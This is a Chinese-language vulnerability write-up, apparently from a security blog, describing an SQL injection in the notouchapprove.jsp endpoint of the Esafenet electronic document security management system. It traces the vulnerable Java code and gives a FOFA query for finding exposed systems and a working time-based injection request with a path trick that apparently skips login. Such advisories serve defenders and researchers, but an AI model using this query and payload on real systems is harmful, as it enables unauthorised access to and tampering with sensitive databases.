亿赛通电子文档安全管理系统 notouchapprove.jsp SQL注入漏洞


漏洞简介

亿赛通电子文档安全管理系统的notouchapprove.jsp接口存在SQL注入漏洞。攻击者可以通过构造特定的POST请求,在多个参数id中注入恶意SQL代码,利用该漏洞对数据库执行任意SQL操作。攻击者可以通过注入WAITFOR DELAY命令,导致数据库响应时间延迟,从而确认SQL注入的成功。此漏洞可能导致数据库中的敏感信息泄露、篡改或删除,严重威胁系统的安全性和数据完整性。

影响版本

fofa语法

app="亿赛通-电子文档安全管理系统" || body="/CDGServer3/index.jsp"

漏洞分析

直接看 notouchapprove.jsp 的定义

<%
    MailDecryptApplicationModel model = new MailDecryptApplicationModel();
    String id = request.getParameter("id");
    MailDecryptApplicationInfo info = model.findById(id);

参数如id被带入findById方法

public MailDecryptApplicationInfo findById(String id) throws Exception {
    return this.dao.findById(id);
}

public MailDecryptApplicationInfo findById(String id) throws Exception {
    if (id == null) {
        return null;
    } else {
        Map table = new Hashtable();
        table.put("MailDecryptApplicationId", id);
        List list = this.findByPrecise(table);
        return (MailDecryptApplicationInfo)(list.size() != 0 ? list.get(0) : null);
    }
}

继续跟进 findByPrecise 方法

public List findByPrecise(Map map) throws Exception {
    StringBuffer sql = new StringBuffer();
    sql.append("select * from " + this.tableName);
    sql.append(CDGUtil.getWhereClauseForString(map));
    HashMap[] maps = this.getCommonResults(sql.toString());

再看下getWhereClauseForString的逻辑

public static String getWhereClauseForString(Map conditions) {
    if (conditions != null && conditions.size() != 0) {
        StringBuilder sBuilder = new StringBuilder();
        Set set = conditions.keySet();
        Iterator iterator = set.iterator();

        while(iterator.hasNext()) {
            String key = (String)iterator.next();
            Object object = conditions.get(key);
            String value = "";
            if (object instanceof String) {
                value = (String)object;
            } else {
                value = object.toString();
            }

            if (iterator.hasNext()) {
                sBuilder.append(" ").append(key).append("='").append(value).append("' and ");
            } else {
                sBuilder.append(" ").append(key).append("='").append(value).append("'  ");
            }
        }

其主要目的就是组装sql语句,可见参数id全程未经任何过滤和校验就被直接拼接进sql语句中进行执行,从而导致sql注入漏洞。

漏洞复现

POST /CDGServer3/client/notouchapprove.jsp;Servicelogin HTTP/1.1
Host: esafenet.mrxn.net
Content-Type: application/x-www-form-urlencoded

id=1'WAITFOR+DELAY'0%3a0%3a5'--

成功延时 5 秒


手机扫码阅读

汉王e脸通综合管理平台 queryMeetingEmployee.do SQL注入漏洞

汉王e脸通综合管理平台 meetingFileManage.do SQL注入漏洞

评 论